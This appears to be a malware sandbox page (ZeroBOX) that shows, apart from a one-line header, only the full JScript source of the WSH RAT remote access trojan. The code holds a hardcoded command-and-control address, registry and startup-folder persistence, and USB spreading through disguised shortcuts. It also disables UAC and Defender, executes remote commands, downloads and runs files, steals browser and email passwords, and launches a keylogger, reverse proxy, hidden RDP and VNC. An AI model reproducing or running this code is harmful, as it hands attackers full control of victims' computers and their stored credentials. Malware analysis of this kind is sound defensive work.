Static | ZeroBOX
No static analysis available.
var ybml;
var host = getHost();
var port = 5200;
var installdir = "%appdata%";
var runAsAdmin = false;
var lnkfile = true;
var lnkfolder = true;
var registry = true;
var startupfold = true;
var anti_bot = false;
if(anti_bot == true){
if(hwid() == ""){
WScript.quit();
if(runAsAdmin == true){
startupElevate();
if(WScript.Arguments.Named.Exists("elevated") == true){
disableSecurity();
var shellobj = WScript.createObject("wscript.shell");
var filesystemobj = WScript.createObject("scripting.filesystemobject");
var httpobj = WScript.createObject("msxml2.xmlhttp");
var installname = WScript.scriptName;
var startup = shellobj.specialFolders("startup") + "\\";
installdir = shellobj.ExpandEnvironmentStrings(installdir) + "\\";
if(!filesystemobj.folderExists(installdir)){ installdir = shellobj.ExpandEnvironmentStrings("%temp%") + "\\";}
var spliter = "|";
var sdkpath = installdir + "wshsdk";
var vncpath = installdir + "uvnc";
var sdkfile = sdkpath + "\\" + chr(112) + chr(121) + chr(116) + chr(104) + chr(111) + chr(110) + chr(46) + chr(101) + chr(120) + chr(101);
var sleep = 5000;
var response, cmd, param, oneonce;
var inf = "";
var usbspreading = "";
var startdate = "";
if(WScript.scriptFullName != (installdir + installname)){
filesystemobj.copyFile(WScript.scriptFullName, installdir + installname, true);
shellobj.run("wscript.exe //B \"" + installdir + installname + "\"");
instance();
if(getBinder() != null){
runBinder();
while(true){
install();
response = "";
response = post ("is-ready","");
cmd = response.split(spliter);
switch(cmd[0]){
case "disconnect":
WScript.quit();
break;
case "reboot":
shellobj.run("%comspec% /c shutdown /r /t 0 /f", 0, true);
break;
case "shutdown":
shellobj.run("%comspec% /c shutdown /s /t 0 /f", 0, true);
break;
case "excecute":
param = cmd[1];
eval(param);
break;
case "install-sdk":
if (filesystemobj.fileExists(sdkfile)){
updatestatus("SDK+Already+Installed");
}else{
installsdk();
break;
case "remove-sdk":
if(filesystemobj.fileExists(installdir + "wshsdk.zip")){
filesystemobj.deleteFile(installdir + "wshsdk.zip");
if (filesystemobj.fileExists(sdkfile)){
filesystemobj.deleteFolder(sdkpath);
updatestatus("SDK+Uninstalled");
break;
case "get-pass":
passgrabber(cmd[1], "cmdc.exe", cmd[2]);
break;
case "get-pass-offline":
if (filesystemobj.fileExists(sdkfile)){
passgrabber(cmd[3], "cmdc.exe", "ie");
passgrabber("null", "cmdc.exe", "chrome");
passgrabber("null", "cmdc.exe", "mozilla");
passgrabber2(cmd[1], "cmdc.exe", cmd[2]);
updatestatus("Installing+SDK");
var stat = installsdk();
if(stat == true){
passgrabber(cmd[3], "cmdc.exe", "ie");
passgrabber("null", "cmdc.exe", "chrome");
passgrabber("null", "cmdc.exe", "mozilla");
passgrabber2(cmd[1], "cmdc.exe", cmd[2]);
var msg = shellobj.ExpandEnvironmentStrings("%computername%") + "/" + shellobj.ExpandEnvironmentStrings("%username%");
post("show-toast", "Unable to automatically recover password for " + msg + " as the Password Recovery SDK cannot be automatically installed. You can try again manually.");
break;
case "update":
param = updaterF(cmd[1]);
if(param != ""){
oneonce.close();
oneonce = filesystemobj.openTextFile(installdir + installname ,2, false);
oneonce.write(param);
oneonce.close();
shellobj.run("wscript.exe //B \"" + installdir + installname + "\"");
WScript.quit();
}else{
updatestatus("Update+Failed");
break;
case "uninstall":
uninstall();
break;
case "up-n-exec":
download(cmd[1],cmd[2]);
break;
case "bring-log":
upload(installdir + "wshlogs\\" + cmd[1], "take-log");
break;
case "down-n-exec":
sitedownloader(cmd[1],cmd[2]);
break;
case "filemanager":
servicestarter(cmd[1], "fm-plugin.exe", information());
break;
case "rdp":
keyloggerstarter(cmd[1], "rd-plugin.exe", information(), "", "rdp");
break;
case "h-browser":
keyloggerstarter("", "hb-plugin.exe", information(), "", "hbrowser");
break;
case "rev-proxy":
reverseproxy("rprox.exe", cmd[1]);
break;
case "exit-proxy":
shellobj.run("%comspec% /c taskkill /F /IM rprox.exe", 0, true);
break;
case "exit-hrdp":
shellobj.run("%comspec% /c taskkill /F /IM hrdp.exe", 0, true);
break;
case "keylogger":
keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 0, "keylogger");
break;
case "offline-keylogger":
keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 1, "keylogger");
break;
case "browse-logs":
post("is-logs", enumfaf(installdir + "wshlogs"));
break;
case "cmd-shell":
param = cmd[1];
post("is-cmd-shell",cmdshell(param));
break;
case "get-processes":
post("is-processes", enumprocess());
break;
case "disable-uac":
disableSecurity();
updatestatus("UAC+Disabled+(Reboot+Required)");
break;
case "check-eligible":
if(filesystemobj.fileExists(cmd[1])){
updatestatus("Is+Eligible");
}else{
updatestatus("Not+Eligible");
break;
case "rev-rdp":
reverserdp(cmd[3] + ".exe", cmd[1], cmd[2]);
break;
case "uvnc":
startUvnc(cmd[1], cmd[2]);
break;
case "force-eligible":
if(WScript.Arguments.Named.Exists("elevated") == true){
if(filesystemobj.folderExists(cmd[1])){
shellobj.run("%comspec% /c " + cmd[2], 0, true);
updatestatus("SUCCESS");
}else{
updatestatus("Component+Missing");
updatestatus("Elevation+Required");
break;
case "elevate":
if(WScript.Arguments.Named.Exists("elevated") == false){
oneonce.close();
oneonce = null;
WScript.CreateObject("Shell.Application").ShellExecute("wscript.exe", " //B \"" + WScript.ScriptFullName + "\" /elevated", "", "runas", 1);
updatestatus("Client+Elevated");
}catch(nn){
WScript.quit();
updatestatus("Client+Elevated");
break;
case "if-elevate":
if(WScript.Arguments.Named.Exists("elevated") == false){
updatestatus("Client+Not+Elevated");
updatestatus("Client+Elevated");
break;
case "kill-process":
exitprocess(cmd[1]);
break;
case "sleep":
param = cmd[1];
sleep = eval(param);
break;
}catch(er){}
WScript.sleep(sleep);
function installsdk(){
var success = false;
var sdkurl = post("moz-sdk", "");
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("get", sdkurl, false);
objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
objhttpdownload.send();
if(filesystemobj.fileExists(installdir + "wshsdk.zip")){
filesystemobj.deleteFile(installdir + "wshsdk.zip");
if (objhttpdownload.status == 200){
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(installdir + "wshsdk.zip");
objstreamdownload.close();
objstreamdownload = null;
}catch(ez){
if(filesystemobj.fileExists(installdir + "wshsdk.zip")){
UnZip(installdir + "wshsdk.zip", sdkpath);
success = true;
updatestatus("SDK+Installed");
}catch(err){
return success;
return success;
function installUVNC(uvnc_url){
var success = false;
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("get", uvnc_url, false);
objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
objhttpdownload.send();
if(filesystemobj.fileExists(installdir + "uvnc.zip")){
filesystemobj.deleteFile(installdir + "uvnc.zip");
if (objhttpdownload.status == 200){
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(installdir + "uvnc.zip");
objstreamdownload.close();
objstreamdownload = null;
}catch(ez){
if(filesystemobj.fileExists(installdir + "uvnc.zip")){
UnZip(installdir + "uvnc.zip", vncpath);
objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(getConfig());
objstreamdownload.Position = 0;
objstreamdownload.Type = 2;
objstreamdownload.CharSet = "us-ascii";
var config = objstreamdownload.ReadText();
objstreamdownload.close();
objstreamdownload = null;
var reg = new RegExp("%path%", "g");
config = config.replace(reg, vncpath + "\\32");
var writer = filesystemobj.openTextFile(vncpath + "\\32\\UltraVNC.ini", 2, true);
writer.writeLine(config);
writer.close();
writer = null;
success = true;
updatestatus("VNC+Installed");
}catch(err){
return success;
return success;
function startU_vnc(filearg){
var mCode = getUVNC();
payloadLuncher(mCode, host + " " + port + " " + filearg);
WScript.sleep(5000);
shellobj.run("\"" + vncpath + "\\32\\winvnc.exe\"");
function startUvnc(vnc_url, filearg){
if (filesystemobj.fileExists(vncpath + "\\32\\winvnc.exe")){
startU_vnc(filearg);
}else{
if (installUVNC(vnc_url)){
startU_vnc(filearg);
}else{
updatestatus("Install+Failed");
function install(){
var lnkobj;
var filename;
var foldername;
var fileicon;
var foldericon;
upstart();
for(var dri = new Enumerator(filesystemobj.drives); !dri.atEnd(); dri.moveNext()){
var drive = dri.item();
if (drive.isready == true){
if (drive.freespace > 0 ){
if (drive.drivetype == 1 ){
filesystemobj.copyFile(WScript.scriptFullName , drive.path + "\\" + installname,true);
if (filesystemobj.fileExists (drive.path + "\\" + installname)){
filesystemobj.getFile(drive.path + "\\" + installname).attributes = 2+4;
}catch(eiju){}
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").files); !fi.atEnd(); fi.moveNext()){
var file = fi.item();
if (lnkfile == false){break;}
if (file.name.indexOf(".")){
if ((file.name.split(".")[file.name.split(".").length - 1]).toLowerCase() != "lnk"){
file.attributes = 2+4;
if (file.name.toUpperCase() != installname.toUpperCase()){
filename = file.name.split(".");
lnkobj = shellobj.createShortcut(drive.path + "\\" + filename[0] + ".lnk");
lnkobj.windowStyle = 7;
lnkobj.targetPath = "cmd.exe";
lnkobj.workingDirectory = "";
lnkobj.arguments = "/c start " + installname.replace(new RegExp(" ", "g"), "\" \"") + "&start " + file.name.replace(new RegExp(" ", "g"), "\" \"") +"&exit";
try{fileicon = shellobj.RegRead ("HKEY_LOCAL_MACHINE\\software\\classes\\" + shellobj.RegRead ("HKEY_LOCAL_MACHINE\\software\\classes\\." + file.name.split(".")[file.name.split(".").length - 1]+ "\\") + "\\defaulticon\\"); }catch(eeee){}
if (fileicon.indexOf(",") == 0){
lnkobj.iconLocation = file.path;
}else {
lnkobj.iconLocation = fileicon;
lnkobj.save();
}catch(err){}
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").subFolders); !fi.atEnd(); fi.moveNext()){
var folder = fi.item();
if (lnkfolder == false){break;}
folder.attributes = 2+4;
foldername = folder.name;
lnkobj = shellobj.createShortcut(drive.path + "\\" + foldername + ".lnk");
lnkobj.windowStyle = 7;
lnkobj.targetPath = "cmd.exe";
lnkobj.workingDirectory = "";
lnkobj.arguments = "/c start " + installname.replace(new RegExp(" ", "g"), "\" \"") + "&start explorer " + folder.name.replace(new RegExp(" ", "g"), "\" \"") +"&exit";
foldericon = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\classes\\folder\\defaulticon\\");
if (foldericon.indexOf(",") == 0){
lnkobj.iconLocation = folder.path;
}else {
lnkobj.iconLocation = foldericon;
lnkobj.save();
}catch(err){}
function startupElevate(){
if(WScript.Arguments.Named.Exists("elevated") == false){
WScript.CreateObject("Shell.Application").ShellExecute("wscript.exe", " //B \"" + WScript.ScriptFullName + "\" /elevated", "", "runas", 1);
}catch(nn){
WScript.quit();
function disableSecurity(){
if(WScript.Arguments.Named.Exists("elevated") == true){
var oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");
oReg.SetDwordValue(0x80000002,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","EnableLUA", 0);
oReg.SetDwordValue(0x80000002,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","ConsentPromptBehaviorAdmin", 0);
oReg.SetDwordValue(0x80000002,"SOFTWARE\\Policies\\Microsoft\\Windows Defender","DisableAntiSpyware", 1);
oReg = null;
function uninstall(){
var filename;
var foldername;
shellobj.RegDelete("HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0]);
shellobj.RegDelete("HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0]);
}catch(ei){}
filesystemobj.deleteFile(startup + installname ,true);
filesystemobj.deleteFile(WScript.scriptFullName ,true);
}catch(eej){}
for(var dri = new Enumerator(filesystemobj.drives); !dri.atEnd(); dri.moveNext()){
var drive = dri.item();
if (drive.isready == true){
if (drive.freespace > 0 ){
if (drive.drivetype == 1 ){
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").files); !fi.atEnd(); fi.moveNext()){
var file = fi.item();
if (file.name.indexOf(".")){
if ((file.name.split(".")[file.name.split(".").length - 1]).toLowerCase() != "lnk"){
file.attributes = 0;
if (file.name.toUpperCase() != installname.toUpperCase()){
filename = file.name.split(".");
filesystemobj.deleteFile(drive.path + "\\" + filename[0] + ".lnk" );
}else{
filesystemobj.deleteFile(drive.path + "\\" + file.name);
}else{
filesystemobj.deleteFile (file.path);
}catch(ex){}
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").subFolders); !fi.atEnd(); fi.moveNext()){
var folder = fi.item();
folder.attributes = 0;
}catch(err){}
WScript.quit();
function post (cmd ,param){
httpobj.open("post","http://" + host + ":" + port +"/" + cmd, false);
httpobj.setRequestHeader("user-agent:",information());
httpobj.send(param);
return httpobj.responseText;
}catch(err){
return "";
function information(){
if (inf == ""){
inf = hwid() + spliter;
inf = inf + shellobj.ExpandEnvironmentStrings("%computername%") + spliter ;
inf = inf + shellobj.ExpandEnvironmentStrings("%username%") + spliter;
var root = GetObject("winmgmts:{impersonationlevel=impersonate}!\\\\.\\root\\cimv2");
var os = root.ExecQuery ("select * from win32_operatingsystem");
for(var fi = new Enumerator(os); !fi.atEnd(); fi.moveNext()){
var osinfo = fi.item();
inf = inf + osinfo.caption + spliter;
break;
inf = inf + "plus" + spliter;
inf = inf + security() + spliter;
inf = inf + usbspreading;
inf = "WSHRAT" + spliter + inf + spliter + "JavaScript-v3.4" + spliter + getCountry();
return inf;
}else{
return inf;
}catch(err){
return "";
function getHost(){
var phost = "79.134.225.94";
if(phost.indexOf("http://") == 0 || phost.indexOf("https://") == 0){
var objhttpdownload = WScript.CreateObject("msxml2.serverxmlhttp");
objhttpdownload.open("get", phost, false);
objhttpdownload.send();
}catch(ep){
WScript.sleep(2000);
return getHost();
if (objhttpdownload.status == 200){
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.Position = 0;
objstreamdownload.Type = 2;
objstreamdownload.CharSet = "us-ascii";
phost = objstreamdownload.ReadText();
objstreamdownload.close();
objstreamdownload = null;
return phost;
}catch(err){
WScript.sleep(2000);
return getHost();
}else{
WScript.sleep(2000);
return getHost();
}else{
return phost;
function getCountry(){
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("get", "http://ip-api.com/json/", false);
objhttpdownload.setRequestHeader("user-agent:", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36");
objhttpdownload.send();
if (objhttpdownload.status == 200){
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.Position = 0;
objstreamdownload.Type = 2;
objstreamdownload.CharSet = "us-ascii";
var raw = objstreamdownload.ReadText();
var cc = "01";
var cn = "Unknown";
cc = raw.substr(raw.indexOf("countryCode") + 14);
cc = cc.substr(0, cc.indexOf("\""));
}catch(err){}
cn = raw.substr(raw.indexOf("country") + 10);
cn = cn.substr(0, cn.indexOf("\""));
}catch(err){}
return cc + ":" + cn;
}else{
return "01:Unknown";
}catch(ex){
return "01:Unknown";
function upstart (){
if(registry == true){
shellobj.RegWrite("HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0], "wscript.exe //B \"" + installdir + installname + "\"" , "REG_SZ");
shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0], "wscript.exe //B \"" + installdir + installname + "\"" , "REG_SZ");
}catch(ei){}
filesystemobj.copyFile(WScript.scriptFullName, installdir + installname, true);
if(startupfold == true){
filesystemobj.copyFile(WScript.scriptFullName, startup + installname, true);
}catch(err){}
function hwid(){
var root = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
var disks = root.ExecQuery ("select * from win32_logicaldisk");
for(var fi = new Enumerator(disks); !fi.atEnd(); fi.moveNext()){
var disk = fi.item();
if (disk.volumeSerialNumber != "" && disk.volumeSerialNumber != null){
return disk.volumeSerialNumber;
break;
return "";
}catch(err){
return "";
function security(){
var objwmiservice = GetObject("winmgmts:{impersonationlevel=impersonate}!\\\\.\\root\\cimv2");
var colitems = objwmiservice.ExecQuery("select * from win32_operatingsystem",null,48);
var versionstr, osversion;
for(var fi = new Enumerator(colitems); !fi.atEnd(); fi.moveNext()){
var objitem = fi.item();
versionstr = objitem.version.toString().split(".");
osversion = versionstr[0] + ".";
for (var x = 1; x < versionstr.length; x++){
osversion = osversion + versionstr[0];
osversion = eval(osversion);
var sc;
if (osversion > 6){ sc = "securitycenter2"; }else{ sc = "securitycenter";}
var objsecuritycenter = GetObject("winmgmts:\\\\localhost\\root\\" + sc);
var colantivirus = objsecuritycenter.ExecQuery("select * from antivirusproduct", "wql", 0);
var secu = "";
for(var fi = new Enumerator(colantivirus); !fi.atEnd(); fi.moveNext()){
var objantivirus = fi.item();
secu = secu + objantivirus.displayName + " .";
if(secu == ""){secu = "nan-av";}
return secu;
}catch(err){}
function getDate(){
var s = "";
var d = new Date();
s += d.getDate() + "/";
s += (d.getMonth() + 1) + "/";
s += d.getYear();
return s;
function instance(){
usbspreading = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\");
}catch(eee){}
if(usbspreading == ""){
if (WScript.scriptFullName.substr(1).toLowerCase() == ":\\" + installname.toLowerCase()){
usbspreading = "true - " + getDate();
try{shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\", usbspreading, "REG_SZ");}catch(eeeee){}
}else{
usbspreading = "false - " + getDate();
try{shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\", usbspreading, "REG_SZ");}catch(eeeee){}
upstart();
var scriptfullnameshort = filesystemobj.getFile(WScript.scriptFullName);
var installfullnameshort = filesystemobj.getFile(installdir + installname);
if (scriptfullnameshort.shortPath.toLowerCase() != installfullnameshort.shortPath.toLowerCase()){
WScript.quit();
oneonce = filesystemobj.openTextFile(installdir + installname ,8, false);
}catch(err){
WScript.quit();
function decode_base64(base64_string){
var yhm_pepe = WScript.CreateObject("ADODB.Stream");
var spike = (WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmp");
spike.dataType = "bin.base64";
spike.text = base64_string;
yhm_pepe.Type = 1;
yhm_pepe.Open();
yhm_pepe.Write(spike.nodeTypedValue);
yhm_pepe.Position = 0;
yhm_pepe.Type = 2;
yhm_pepe.CharSet = "us-ascii";
return yhm_pepe.ReadText();
function decode_pass(retcmd){
var content, nss, command;
if(retcmd == "mozilla"){
command = "give-me-ffpv";
}else if(retcmd == "chrome"){
command = "give-me-chpv";
}else if(retcmd == "foxmail"){
command = "give-me-fm";
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("post", "http://" + host + ":" + port +"/" + command, false);
objhttpdownload.setRequestHeader("user-agent:", information());
objhttpdownload.send("");
if(filesystemobj.fileExists(installdir + "rundll")){
filesystemobj.deleteFile(installdir + "rundll");
if (objhttpdownload.status == 200){
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.Position = 0;
objstreamdownload.Type = 2;
objstreamdownload.CharSet = "us-ascii";
content = objstreamdownload.ReadText();
nss = sdkpath + "\\nss";
content = content.replace(new RegExp("%nss%", "g"), nss); //for firefox
content = content.replace(new RegExp("%path%", "g"), installdir + "Login Data"); //for chrome
var sw = filesystemobj.openTextFile(installdir + "rundll", 2, true);
sw.write(content);
sw.close();
sw = null;
objstreamdownload.close();
objstreamdownload = null;
}catch(ez){}
shellobj.run("%comspec% /c cd \"" + sdkpath + "\" && " + gsp(sdkfile) + " " + gsp(installdir + "rundll") + " > \"" + installdir + "wshout\"", 0, true);
WScript.sleep(2000);
var sr = filesystemobj.openTextFile(installdir + "wshout");
content = sr.readall();
sr.close();
sr = null;
filesystemobj.deleteFile(installdir + "rundll");
filesystemobj.deleteFile(installdir + "wshout");
post(retcmd, content);
}catch(err){
function chr(code){
return String.fromCharCode(code);
function gsp(path){
return filesystemobj.getFile(path).shortPath;
function passgrabber (fileurl, filename, retcmd){
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
var content, profile, folder;
if (retcmd == "ie"){
content = decode_base64(fileurl);
eval(content);
return;
}else if(retcmd == "chrome"){
folder = shellobj.ExpandEnvironmentStrings("%temp%");
folder = folder.substr(0, folder.toLowerCase().indexOf("temp")) + "Google\\Chrome\\User Data\\Default\\Login Data";
if (objfsodownload.fileExists(folder) ){
objfsodownload.copyFile(folder, installdir + "Login Data", true);
if (objfsodownload.fileExists(sdkfile)){
decode_pass(retcmd);
objfsodownload.deleteFile(installdir + "Login Data");
}else{
post("show-toast", "WSH Sdk for password recovery not found, You can install this SDK from the password recovery menu");
}else{
post(retcmd, "No Password Found");
}else if(retcmd == "foxmail"){
if (objfsodownload.fileExists(sdkfile)){
decode_pass(retcmd);
}else{
post("show-toast", "WSH Sdk for password recovery not found, You can install this SDK from the password recovery menu");
}else if(retcmd == "mozilla"){
folder = shellobj.ExpandEnvironmentStrings("%appdata%") + "\\Mozilla\\Firefox\\";
if (objfsodownload.fileExists (folder + "profiles.ini")){
content = filesystemobj.openTextFile(folder + "profiles.ini").readall();
if (content.indexOf("Path=") > 0) {
content = content.substr(content.indexOf("Path=") + 5);
content = content.substr(0, content.indexOf("\r\n"));
profile = (folder + content).replace(new RegExp("/", "g"), "\\");
folder = profile + "\logins.json";
if (objfsodownload.fileExists(sdkfile)){
decode_pass(retcmd);
}else{
post("show-toast", "WSH Sdk for password recovery not found, You can install this SDK from the password recovery menu");
}else{
post(retcmd, "No Password Found");
}else{
post(retcmd, "No Password Found");
}else{
passgrabber2(fileurl, filename, retcmd);
}catch(err){}
function UnZip(zipfile, ExtractTo){
if(filesystemobj.GetExtensionName(zipfile) == "zip"){
if(!filesystemobj.FolderExists(ExtractTo)){
filesystemobj.CreateFolder(ExtractTo);
var objShell = WScript.CreateObject("Shell.Application");
var destination = objShell.NameSpace(ExtractTo);
var zip_content = objShell.NameSpace(zipfile).Items();
for(i = 0; i < zip_content.Count; i++){
if(filesystemobj.FileExists(filesystemobj.Buildpath(ExtractTo,zip_content.item(i).name)+"."+filesystemobj.getExtensionName(zip_content.item(i).path))){
filesystemobj.DeleteFile(filesystemobj.Buildpath(ExtractTo,zip_content.item(i).name)+"."+filesystemobj.getExtensionName(zip_content.item(i).path));
destination.copyHere(zip_content.item(i), 20);
function passgrabber2(fileurl, filename, retcmd){
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
try{filesystemobj.deleteFile(installdir + filename + "data");}catch(ey){}
var config_file = installdir + filename.substr(0, filename.lastIndexOf(".")) + ".cfg";
var cfg = "[General]\nShowGridLines=0\nSaveFilterIndex=0\nShowInfoTip=1\nUseProfileFolder=0\nProfileFolder=\nMarkOddEvenRows=0\nWinPos=2C 00 00 00 00 00 00 00 01 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00 80 02 00 00 E0 01 00 00\nColumns=FA 00 00 00 FA 00 01 00 6E 00 02 00 6E 00 03 00 78 00 04 00 78 00 05 00 78 00 06 00 64 00 07 00 FA 00 08 00\nSort=0";
var writer = filesystemobj.openTextFile(config_file, 2, true);
writer.writeLine(cfg);
writer.close();
writer = null;
var strlink = fileurl;
var strsaveto = installdir + filename;
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){
objfsodownload.deleteFile(strsaveto);
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(getMailRec());
objstreamdownload.SaveToFile(strsaveto + ".zip", 2);
objstreamdownload.close();
objstreamdownload = null;
if(objfsodownload.fileExists(strsaveto + ".zip")){
UnZip(strsaveto + ".zip", installdir);
var runner = WScript.CreateObject("Shell.Application");
var saver = objfsodownload.getFile(strsaveto).shortPath
for(var i=0; i<5; i++){
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
WScript.sleep(1000);
runner.shellExecute(saver, " /stext " + saver + "data");
WScript.sleep(2000);
if(objfsodownload.fileExists(saver + "data")){
var sr = filesystemobj.openTextFile(saver + "data");
var buffer = "";
try{buffer = sr.readall();}catch(ee){}
sr.close();
sr = null;
var outpath = installdir + "wshlogs\\recovered_password_email.log";
var folder = objfsodownload.GetParentFolderName(outpath);
if (!objfsodownload.FolderExists(folder))
shellobj.run("%comspec% /c mkdir \"" + folder + "\"", 0, true);
writer = filesystemobj.openTextFile(outpath, 2, true);
writer.write(buffer);
writer.close();
writer = null;
upload(saver + "data", retcmd);
break;
deletefaf(strsaveto);
function reverseproxy (filename, filearg){
var mCode = getReverseProxy();
payloadLuncher(mCode, host + " " + port + " " + filearg);
}catch(err){
updatestatus("Access+Denied");
function reverserdp(filename, filearg, fileurl){
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
var strsaveto = installdir + filename;
var objhttpdownload = WScript.CreateObject("msxml2.serverxmlhttp" );
objhttpdownload.open("get", fileurl, false);
objhttpdownload.send();
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){
objfsodownload.deleteFile(strsaveto);
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
}catch(err){
updatestatus("Access+Denied");
if(objfsodownload.fileExists(strsaveto)){
shellobj.run("\"" + strsaveto + "\" " + host + " " + port + " " + filearg );
updatestatus("HRDP+Accepted");
}catch(err){
updatestatus("HRDP+Denied");
function keyloggerstarter (fileurl, filename, filearg, is_offline, s_type){
var mCode;
if(s_type == "rdp"){
mCode = getRDP();
}else if(s_type == "keylogger"){
mCode = getKeyLogger();
}else if(s_type == "hbrowser"){
mCode = getHbrowser();
payloadLuncher(mCode, host + " " + port + " \\\"" + filearg + "\\\" " + is_offline);
}catch(err){
updatestatus("Access+Denied");
function servicestarter (fileurl, filename, filearg){
var strlink = fileurl;
var strsaveto = installdir + filename;
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp" );
objhttpdownload.open("get", strlink, false);
objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
objhttpdownload.send();
var filestr = Base64Encode(objhttpdownload.responseBody);
payloadLuncher(filestr, host + " " + port + " \\\"" + filearg + "\\\"");
}catch(err){
updatestatus("Access+Denied");
function sitedownloader (fileurl,filename){
var strlink = fileurl;
var strsaveto = installdir + filename;
var objhttpdownload = WScript.CreateObject("msxml2.serverxmlhttp" );
objhttpdownload.open("get", strlink, false);
objhttpdownload.send();
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){
objfsodownload.deleteFile(strsaveto);
if (objhttpdownload.status == 200){
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
if(objfsodownload.fileExists(strsaveto)){
shellobj.run(objfsodownload.getFile(strsaveto).shortPath);
updatestatus("Executed+File");
function download (fileurl,filedir){
if(filedir == ""){
filedir = installdir;
strsaveto = filedir + fileurl.substr(fileurl.lastIndexOf("\\") + 1);
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("post","http://" + host + ":" + port +"/" + "send-to-me" + spliter + fileurl, false);
objhttpdownload.setRequestHeader("user-agent:", information());
objhttpdownload.send("");
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){
objfsodownload.deleteFile(strsaveto);
if (objhttpdownload.status == 200){
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
if(objfsodownload.fileExists(strsaveto)){
shellobj.run(objfsodownload.getFile(strsaveto).shortPath);
updatestatus("Executed+File");
function updaterF (fileurl){
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("post","http://" + host + ":" + port +"/" + "send-to-me" + spliter + fileurl, false);
objhttpdownload.setRequestHeader("user-agent:", information());
objhttpdownload.send("");
if (objhttpdownload.status == 200){
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.Position = 0;
objstreamdownload.Type = 2;
objstreamdownload.CharSet = "us-ascii";
var rr = objstreamdownload.ReadText();
objstreamdownload.close();
objstreamdownload = null;
return rr;
return "";
function updatestatus(status_msg){
var objsoc = WScript.CreateObject("msxml2.xmlhttp");
objsoc.open("post","http://" + host + ":" + port + "/" + "update-status" + spliter + status_msg, false);
objsoc.setRequestHeader("user-agent:", information());
objsoc.send("");
}catch(err){}
